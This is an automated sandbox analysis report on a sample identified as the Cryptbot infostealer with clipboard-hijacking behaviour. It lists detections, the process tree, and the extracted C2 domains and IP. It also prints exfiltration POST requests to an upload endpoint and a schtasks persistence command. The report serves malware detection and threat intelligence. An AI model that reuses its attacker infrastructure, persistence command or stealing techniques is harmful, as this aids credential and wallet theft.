Edit tour

Windows Analysis Report
lkOawAWJRO.exe

Overview

General Information

Sample name:	lkOawAWJRO.exe renamed because original name is a hash value
Original sample name:	1b05ebbfcec15b251b93721338e525c8.exe
Analysis ID:	1532112
MD5:	1b05ebbfcec15b251b93721338e525c8
SHA1:	475e17fb4ea6e1d41b18086c541c338b862e1bf4
SHA256:	ab30569e57ecb3c3d674890e89a90bebe8884071053a48c2a18dbf8ffc8aa7c3
Tags:	32exetrojan
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

lkOawAWJRO.exe (PID: 5648 cmdline: "C:\Users\user\Desktop\lkOawAWJRO.exe" MD5: 1B05EBBFCEC15B251B93721338E525C8)

service123.exe (PID: 1048 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 751D09B372396BF3012988CD55D9E27E)

schtasks.exe (PID: 6432 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 1628 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 751D09B372396BF3012988CD55D9E27E)

service123.exe (PID: 5672 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 751D09B372396BF3012988CD55D9E27E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["sevtvr17pt.top", "analforeverlovyu.top", "+sevtvr17pt.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2632067693.0000000004106000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: lkOawAWJRO.exe PID: 5648	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: lkOawAWJRO.exe PID: 5648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lkOawAWJRO.exe PID: 5648	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 1048	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.service123.exe.6c210000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\lkOawAWJRO.exe", ParentImage: C:\Users\user\Desktop\lkOawAWJRO.exe, ParentProcessId: 5648, ParentProcessName: lkOawAWJRO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 6432, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-12T12:30:12.478180+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49704	80.66.81.78	80	TCP
2024-10-12T12:30:16.140581+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49705	80.66.81.78	80	TCP
2024-10-12T12:30:21.029581+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49718	80.66.81.78	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: lkOawAWJRO.exe.5648.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["sevtvr17pt.top", "analforeverlovyu.top", "+sevtvr17pt.top"]}

Multi AV Scanner detection for submitted file

Source: lkOawAWJRO.exe

Virustotal: Detection: 34%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006C15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_006C15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2114B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_6C2114B0

Source: lkOawAWJRO.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: lkOawAWJRO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	5_2_006C81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C28AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C28AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C28AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C230860
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C23A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C23A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C23A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C2EF960h	5_2_6C22EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C234453
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C2B84A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C23C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C23A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C23A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C23A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C23E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C23E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	5_2_6C2B0730
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C230740
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C28C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C28C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	5_2_6C26A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C230260
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C2ED014h]	5_2_6C2E4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C28BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C287D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C283840
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	5_2_6C23D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C269B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C24BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C24BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C28B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C23D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_6C289600
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	5_2_6C23D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C2EDFF4h	5_2_6C283690
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	5_2_6C23D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C2B3140
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C22B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C23D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C2A7350

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49704 -> 80.66.81.78:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49705 -> 80.66.81.78:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49718 -> 80.66.81.78:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sevtvr17pt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: +sevtvr17pt.top

Source: Joe Sandbox View

ASN Name: TEAM-HOSTASRU TEAM-HOSTASRU

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70714139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtvr17pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary60025149User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 89801Host: sevtvr17pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary57094190User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30023Host: sevtvr17pt.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: sevtvr17pt.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary70714139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 412Host: sevtvr17pt.top

Source: lkOawAWJRO.exe, 00000000.00000003.2159936721.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2148278787.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtvr17pt.top/
Source: lkOawAWJRO.exe, 00000000.00000003.2148278787.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2148345397.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtvr17pt.top/v1/upload.php
Source: lkOawAWJRO.exe, 00000000.00000003.2148278787.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2148345397.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2159936721.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sevtvr17pt.top:80/v1/upload.php
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FuLvJKHyBveQGVRTqGwm.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: lkOawAWJRO.exe	String found in binary or memory: https://keruzam.com/update.php?compName
Source: lkOawAWJRO.exe, 00000000.00000003.2653416501.000000006A364000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keruzam.com/update.php?compName=
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C229C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_6C229C22

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C229C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6C229C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C229D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_6C229D11

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C229E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_6C229E27

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006C51B0	5_2_006C51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006C3E20	5_2_006C3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C252CCE	5_2_6C252CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C21CD00	5_2_6C21CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C21EE50	5_2_6C21EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C220FC0	5_2_6C220FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C260AC0	5_2_6C260AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2244F0	5_2_6C2244F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2546E0	5_2_6C2546E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2487C0	5_2_6C2487C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2507D0	5_2_6C2507D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C260060	5_2_6C260060
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C252090	5_2_6C252090
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C242360	5_2_6C242360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C26DC70	5_2_6C26DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C225880	5_2_6C225880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2498F0	5_2_6C2498F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C257A20	5_2_6C257A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C25DBEE	5_2_6C25DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C25140E	5_2_6C25140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C261510	5_2_6C261510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C25F610	5_2_6C25F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C23F760	5_2_6C23F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C213000	5_2_6C213000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2270C0	5_2_6C2270C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2D50D0	5_2_6C2D50D0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C2DADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C2E3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C2E5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C2E3560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C2E5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C2E3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C2E36E0 appears 45 times

Source: lkOawAWJRO.exe, 00000000.00000002.2654737502.0000000000E46000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameschtasks.exe.muij% vs lkOawAWJRO.exe

Source: lkOawAWJRO.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

File created: C:\Users\user\AppData\Local\kKtrgiVDVp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\wRMVnNmaPquezxYczDTZ

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: lkOawAWJRO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lkOawAWJRO.exe, 00000000.00000003.2200618786.0000000001878000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: lkOawAWJRO.exe

Virustotal: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\lkOawAWJRO.exe "C:\Users\user\Desktop\lkOawAWJRO.exe"
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: urlmon.dll	Jump to behavior
